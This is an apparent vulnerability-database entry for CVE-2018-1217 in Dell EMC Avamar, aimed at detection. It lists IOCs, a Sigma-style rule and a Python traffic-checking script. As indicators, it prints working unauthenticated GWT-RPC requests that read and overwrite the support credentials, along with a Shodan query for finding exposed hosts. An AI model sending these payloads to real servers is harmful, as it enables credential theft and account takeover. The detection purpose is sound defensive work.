cbcvebase.
CVE-2018-1217
published 2018-04-09


Priority: P188 critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploitation: exploited in the wild (VulnCheck KEV)
EPSS: 46.64% (98.7th percentile)
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to the Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to log in to Dell EMC Online Support, impersonating the AVI service actions using those credentials.

Affected (5 ranges)

Vendor/product: dellemc_avamar (3 ranges)
Vendor/product: dellemc_integrated_data_protection_appliance (2 ranges)

Detection & IOCs (extracted from sources)

url: /avi/avigui/avigwt
path: /avi/avigui/avigwt
other: 60AF6BC6976F9B1F05AC454813F5324D
command: 7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|
command: 7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
command: 7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7|
other: text/x-gwt-rpc; charset=utf-8
other: Jetty(9.0.6.v20130930)
sigma: contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword") AND status_code == 200
  • Alert on HTTP 200 responses from /avi/avigui/avigwt whose body contains all three of '//OK', 'emcsupportUsername' and 'emcsupportPassword': this indicates successful credential exfiltration.
  • The GWT serialization token '60AF6BC6976F9B1F05AC454813F5324D' appears in all exploit payloads targeting this vulnerability and can be used as a network signature.
  • Monitor for the GWT RPC service name 'com.avamar.avinstaller.gwt.shared.AvinstallerService' in HTTP POST body to /avi/avigui/avigwt from unauthenticated sessions (no valid session cookie).
  • Shodan query 'title:"AVAMAR"' can be used to identify internet-exposed Avamar Installation Manager instances potentially vulnerable to this CVE.
  • Tampered/injected GWT response body '//OK[1,["true"],0,7]' for the supportLogin method can be used to detect response-tampering attacks (e.g., via proxy) that unlock the support account.
  • The vulnerability requires no authentication; any network-level control blocking unauthenticated access to /avi/avigui/avigwt will mitigate exploitation. Credentials are returned in plaintext in the HTTP response body.
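The detection bullets above, turned into one check over a request/response pair, as an added example (not code from this database or from Dell EMC). The request/response dict shapes, the example hostname and the sample traffic are constructed for the demonstration.

```python
# Added example (not the database's or Dell EMC's code): checks one HTTP
# request/response pair for the CVE-2018-1217 indicators listed above.
# Hostnames and the sample traffic below are constructed.
RPC_PATH = "/avi/avigui/avigwt"
SERVICE = "com.avamar.avinstaller.gwt.shared.AvinstallerService"
TOKEN = "60AF6BC6976F9B1F05AC454813F5324D"
LDLS_METHODS = {"getLDLSConfig", "saveLDLSConfig", "supportLogin"}
LEAK_MARKERS = ("//OK", "emcsupportUsername", "emcsupportPassword")
UNLOCK_BODY = '//OK[1,["true"],0,7]'


def parse_gwt_rpc(body):
    """Split a GWT-RPC body on '|'; the method name follows the service name."""
    fields = body.split("|")
    service = method = None
    for i, field in enumerate(fields):
        if field == SERVICE:
            service = field
            method = fields[i + 1] if i + 1 < len(fields) else None
    return TOKEN in fields, service, method


def check_exchange(req, resp):
    """Return alert names; req = {path, headers, body}, resp = {status, body}."""
    alerts = []
    if req["path"].startswith(RPC_PATH):
        token_seen, service, method = parse_gwt_rpc(req["body"])
        has_session = any(k.lower() == "cookie" for k in req["headers"])
        if service == SERVICE and method in LDLS_METHODS and not has_session:
            alerts.append("unauthenticated-ldls-rpc:" + method)
        if token_seen:
            alerts.append("gwt-token-signature")
    if resp["status"] == 200:
        if all(m in resp["body"] for m in LEAK_MARKERS):
            alerts.append("ldls-credential-disclosure")
        if UNLOCK_BODY in resp["body"]:
            alerts.append("supportlogin-unlock-response")
    return alerts


# Constructed sample: unauthenticated getLDLSConfig call and a leaking reply.
SAMPLE_REQ = {
    "path": "/avi/avigui/avigwt",
    "headers": {"Content-Type": "text/x-gwt-rpc; charset=utf-8"},
    "body": "7|0|6|https://avamar.example/avi/avigui/|" + TOKEN + "|" + SERVICE
    + "|getLDLSConfig|java.lang.String/2004016611|avamar.example|1|2|3|4|2|5|5|6|0|",
}
SAMPLE_RESP = {"status": 200,
               "body": '//OK[..."emcsupportPassword","emcsupportUsername"...]'}
```

The token match fires on legitimate installer traffic too, so treat it as a correlating signal and page on the unauthenticated-call and credential-disclosure alerts.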

CVSS provenance

nvd v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck: 9.8 CRITICAL